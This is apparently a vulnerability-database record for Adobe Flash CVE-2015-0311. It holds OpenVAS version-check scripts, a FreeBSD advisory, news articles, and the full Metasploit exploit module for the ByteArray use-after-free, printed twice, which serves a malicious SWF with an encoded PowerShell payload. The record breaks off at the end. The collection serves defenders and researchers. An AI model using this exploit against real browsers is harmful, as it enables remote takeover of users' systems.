"type": "openvas", "title": "Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805260\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 16:16:40 +0530 (Tue, 27 Jan 2015)\");\n script_name(\"Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified\n error and double-free flaw that is triggered as user-supplied input is not\n properly validated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 13.x through\n 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.264 or 16.0.0.296 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62432\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb15-03-cve-2015-0312\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"13.0\", test_version2:\"13.0.0.262\")||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"16.0.0.287\"))\n{\n if(playerVer =~ \"^13\\.\") {\n fix = \"13.0.0.264\";\n } else {\n fix = \"16.0.0.296\";\n }\n\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312"], "description": "This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.", "modified": "2019-07-17T00:00:00", "published": "2015-01-27T00:00:00", "id": "OPENVAS:1361412562310805259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805259", "type": "openvas", "title": "Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805259\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283, 72343);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-27 16:33:53 +0530 (Tue, 27 Jan 2015)\");\n script_name(\"Adobe Flash Player Unspecified Code Execution Vulnerability - Jan15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to unspecified arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some unspecified\n error and double-free flaw that is triggered as user-supplied input is not\n properly validated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 13.x through\n 13.0.0.262 and 14.x, 15.x, and 16.x through 16.0.0.287 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.264 or 16.0.0.296 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62432\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsa15-01.html\");\n script_xref(name:\"URL\", value:\"http://www.rapid7.com/db/vulnerabilities/adobe-flash-apsb15-03-cve-2015-0312\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"13.0\", test_version2:\"13.0.0.262\")||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"16.0.0.287\"))\n{\n if(playerVer =~ \"^13\\.\") {\n fix = \"13.0.0.264\";\n } else {\n fix = \"16.0.0.296\";\n }\n\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0326", "CVE-2015-0328", "CVE-2015-0329", "CVE-2015-0327", "CVE-2015-0321", "CVE-2015-0317", "CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0330", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0314", "CVE-2015-0302", "CVE-2015-0322", "CVE-2015-0324", "CVE-2015-0315", "CVE-2015-0311", "CVE-2015-0318", "CVE-2015-0307", "CVE-2015-0319", "CVE-2015-0325", "CVE-2015-0316", "CVE-2015-0306", "CVE-2015-0320", "CVE-2015-0310", "CVE-2015-0323"], "description": "Gentoo Linux Local Security Checks GLSA 201502-02", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121341", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121341", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201502-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201502-02.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121341\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:27 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201502-02\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201502-02\");\n script_cve_id(\"CVE-2015-0301\", \"CVE-2015-0302\", \"CVE-2015-0303\", \"CVE-2015-0304\", \"CVE-2015-0305\", \"CVE-2015-0306\", \"CVE-2015-0307\", \"CVE-2015-0308\", \"CVE-2015-0309\", \"CVE-2015-0310\", \"CVE-2015-0311\", \"CVE-2015-0314\", \"CVE-2015-0315\", \"CVE-2015-0316\", \"CVE-2015-0317\", \"CVE-2015-0318\", \"CVE-2015-0319\", \"CVE-2015-0320\", \"CVE-2015-0321\", \"CVE-2015-0322\", \"CVE-2015-0323\", \"CVE-2015-0324\", \"CVE-2015-0325\", \"CVE-2015-0326\", \"CVE-2015-0327\", \"CVE-2015-0328\", \"CVE-2015-0329\", \"CVE-2015-0330\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201502-02\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.442\"), vulnerable: make_list(\"lt 11.2.202.442\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:05", "description": "", "published": "2015-03-12T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2015-03-12T00:00:00", "id": "PACKETSTORM:130788", "href": "https://packetstormsecurity.com/files/130788/Adobe-Flash-Player-ByteArray-UncompressViaZlibVariant-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free', \n'Description' => %q{ \nThis module exploits an use after free vulnerability in Adobe Flash Player. The \nvulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying \nto uncompress() a malformed byte stream. This module has been tested successfully \non Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and \n16.0.0.235. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery and exploit in the wild \n'hdarwin', # Public exploit by @hdarwin89 \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['CVE', '2015-0311'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], \n['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], \n['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => OperatingSystems::Match::WINDOWS_7, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^16\\./ && ver <= '16.0.0.287' }, \n:arch => ARCH_X86 \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 28 2014', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \npsh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) \nb64_payload = Rex::Text.encode_base64(psh_payload) \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/130788/adobe_flash_uncompress_zlib_uaf.rb.txt"}], "zdt": [{"lastseen": "2018-01-03T21:23:47", "edition": 2, "description": "This Metasploit module exploits an use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This Metasploit module has been tested successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235.", "published": "2015-03-12T00:00:00", "type": "zdt", "title": "Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0311"], "modified": "2015-03-12T00:00:00", "id": "1337DAY-ID-23380", "href": "https://0day.today/exploit/description/23380", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',\r\n 'Description' => %q{\r\n This module exploits an use after free vulnerability in Adobe Flash Player. The\r\n vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying\r\n to uncompress() a malformed byte stream. This module has been tested successfully\r\n on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and\r\n 16.0.0.235.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and exploit in the wild\r\n 'hdarwin', # Public exploit by @hdarwin89\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-0311'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],\r\n ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],\r\n ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^16\\./ && ver <= '16.0.0.287' },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 28 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23380"}], "freebsd": [{"lastseen": "2019-05-29T18:33:21", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0311"], "description": "\nAdobe reports:\n\nSuccessful exploitation could cause a crash and potentially allow\n\t an attacker to take control of the affected system. We are aware\n\t of reports that this vulnerability is being actively exploited in\n\t the wild via drive-by-download attacks against systems running\n\t Internet Explorer and Firefox on Windows 8.1 and below.\n\n", "edition": 4, "modified": "2015-01-22T00:00:00", "published": "2015-01-22T00:00:00", "id": "37A87ADE-A59F-11E4-958E-0011D823EEBD", "href": "https://vuxml.freebsd.org/freebsd/37a87ade-a59f-11e4-958e-0011d823eebd.html", "title": "Adobe Flash Player -- critical vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:34", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311", "CVE-2015-0310"], "description": "[](<https://4.bp.blogspot.com/-vO9W63ptsQ4/VMU-hYP074I/AAAAAAAAhl8/M4u9xsJ6VTg/s1600/adobe-flash-player-update.png>)\n\nReady to patch your Adobe Flash software now. Adobe has patched one after one two **_zero-day vulnerabilities_** in its [Adobe Flash](<https://thehackernews.com/search/label/Adobe%20Flash>) that are being actively exploited by the cyber criminals.\n\n \n\n\n**PATCH FOR FIRST ZERO-DAY**\n\nOn Thursday, the company released an emergency update for one of the critical vulnerabilities in Flash Player. However, the flaw was not the one that security researcher Kafeine reported. Adobe focused on another zero-day, identified as **_CVE-2015-0310_**, that was also exploited by Angler malicious toolkit. \n\n \n\n\n**PATCH FOR SECOND ZERO-DAY **\n\nToday, Adobe released an updated version of its Flash player software that patches a [zero-day vulnerability](<https://thehackernews.com/search/label/Zero-Day%20Vulnerability>), tracked as CVE-2015-0311, spotted by French security researcher Kafeine at the beginning of the week. \n\n \n\n\nThe vulnerability is \"_being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below,_\" Adobe said in a security [advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-01.html>). The company defines **_CVE-2015-0311 _**as \"critical,\" which means that \"_the vulnerability, which, if exploited would allow malicious native-code to execute, potentially without a user being aware._\"\n\n \n\n\n**DRIVE-BY-DOWNLOAD ATTACKS**\n\nIn case of a **_\"drive-by-download\" attack_**, an attacker downloads a malicious software to a victim's computer without their knowledge or explicit consent. As a result, the flaw could allow remote attackers to take control of victims\u2019 Macs or PCs.\n\n \n\n\nAccording to the tests carried out by the security researcher, _CVE-2015-0311 _affected all versions of Flash Player included in any version of **_Windows operating system_**, any version of _Internet Explorer (IE)_ and Mozilla Firefox as well. However, the Google Chrome users were safe as the exploit was not triggered on Chrome.\n\n \n\n\n**AFFECTED SOFTWARE VERSIONS **\n\n * Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh\n * Adobe Flash Player 13.0.0.262 and earlier 13.x versions\n * Adobe Flash Player 11.2.202.438 and earlier versions for Linux\n\nDue to the actively exploitation of the zero-day flaw by malicious actors, the company is urging Adobe Flash Player users to update their software as soon as possible.\n\n> Adobe updated its security advisory on Saturday and stated, \"_Users who have enabled auto-update for the Flash Player desktop runtime will be receiving version 16.0.0.296 beginning on January 24. This version includes a fix for CVE-2015-0311. Adobe expects to have an update available for manual download during the week of January 26, and we are working with our distribution partners to make the update available in Google Chrome and Internet Explorer 10 and 11. For more information on updating Flash Player please refer to this post._\"\n\nDespite number of security problems in its software, Adobe has improved the security of its products in recent year, and we really appreciate for its quick response and management to roll a patch before the company scheduled to deliver it.\n", "modified": "2015-01-25T19:11:50", "published": "2015-01-25T08:11:00", "id": "THN:52D71A1567BF0E67D7740044EBED3202", "href": "https://thehackernews.com/2015/01/adobe-flash-player-update.html", "type": "thn", "title": "Adobe patches 2nd Flash Player Zero-day Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:33", "bulletinFamily": "info", "cvelist": ["CVE-2015-0313", "CVE-2015-0311", "CVE-2015-0310"], "description": "[](<https://4.bp.blogspot.com/-ZR_eZUqH9J4/VM-zvWG3m1I/AAAAAAAAhsM/VKJKFve5iBw/s1600/adobe-flash-zero-day-vulnerability.png>)\n\nWarning for Adobe users! Another _zero-day vulnerability_ has been discovered in **_[Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash%20Player>) _**that is actively being exploited by cyber crooks in drive-by download attacks, security researchers warned today. \n\n \n\n\nThis is for the third time in last few weeks when Adobe is dealing with a zero day vulnerability in Flash Player. The Adobe Flash Player Vulnerability identified as **__CVE-2015-0313__**, exists in the latest version of Flash Player, i.e. version 16.0.0.296 and earlier.\n\n \n\n\nIn late January, Adobe released an [updated version of its Flash player](<https://thehackernews.com/2015/01/adobe-flash-player-update.html>) software that patches zero-day vulnerability, tracked as _CVE-2015-0311_, spotted by French security researcher Kafeine. This Adobe Flash Player Vulnerability was also being actively exploited via Malvertisement and drive-by-download attacks.\n\n \n\n\nIn case of a \"drive-by-download\" attack, an attacker downloads a malicious software to a victim's computer without their knowledge or explicit consent. As a result, the flaw could allow remote attackers to take control of victims\u2019 Macs or PCs.\n\n \n\n\nOn January 22, the company released an emergency update for second zero-day flaw, identified as CVE-2015-0310, that was circulating and exploited by Angler malicious toolkit.\n\n \n\n\nIn a [security advisory](<https://helpx.adobe.com/security/products/flash-player/apsa15-02.html>) released Monday, Adobe officials said that they are working on a patch and planning to release it sometime this week. The Adobe Flash Player zero-day vulnerability targets computers running all versions of Internet Explorer and Mozilla Firefox, on Windows 8.1 and earlier. In addition to Windows, the flaw affects Flash on OS X and Linux. \n\n \n\n\nThis newest zero-day vulnerability in Flash reportedly is being used by the Angler kit, as well. If successfully exploited, the vulnerability could cause a crash and potentially allow criminal hackers to take control of the affected system.\n\n \n\n\nCybercriminals are currently using this zero-day flaw in a malvertising campaign on a popular video sharing site Dailymotion, with other websites thought to be affected as the infections were launched via advertising platform and not the website content itself. \n\n \n\n\nVisitors to any of the affected sites would have been redirected to a series of websites and finally landed on a page controlled by attackers, hosting an exploit kit. This exploit kit would attempt to compromise the target system by exploiting the Adobe Flash zero-day flaw.\n\n \n\n\nSecurity firm Trend Micro, who reported the zero-day to Adobe, had been tracking this Flash zero-day vulnerability since January 14 and had been working with Adobe to fix the issue. \n\n> Trend Micro [said](<http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/>) it had \"_seen around 3,294 hits related to the exploit_\". The firm is recommending users \"_consider disabling Flash Player until a fixed version is released_\".\n\n> \"_We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below,_\" Adobe said in its own advisory.\n\nAdobe didn\u2019t specify the day on which the patch would be released, but said it would release a fix for this \"critical vulnerability\" this week. Users who are concerned about this security issue can **__temporarily disable Adobe Flash in the browsers__**. \n \n**SECURITY PATCH RELEASES [UPDATE (5/2/2015)]** \nAdobe has released [security updates for Adobe Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-04.html>) for Windows, Macintosh and Linux in order to patch a _zero-day vulnerability_, identified as **_CVE-2015-0313_**, that could potentially allow an attacker to take control of the affected system. \n \nThe company recommends its users to update their software installations to the latest versions: \n\n\n * Users of the Adobe Flash Player desktop versions for Windows and Macintosh should update to Adobe Flash Player 16.0.0.305\n * Users of the Adobe Flash Player Extended Support Release should update to Adobe Flash Player 13.0.0.269\n * Users of Adobe Flash Player for Linux should update to Adobe Flash Player 11.2.202.442\n * Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, will automatically update to version 16.0.0.305\n", "modified": "2015-02-05T18:57:31", "published": "2015-02-02T06:29:00", "id": "THN:40B2D007112A9624A902E319B3C1366B", "href": "https://thehackernews.com/2015/02/adobe-flash-zero-day-vulnerability_2.html", "type": "thn", "title": "Another Unpatched Adobe Flash Zero-Day vulnerability Exploited in the Wild", "cvss": {"score": 10.0, "vector": 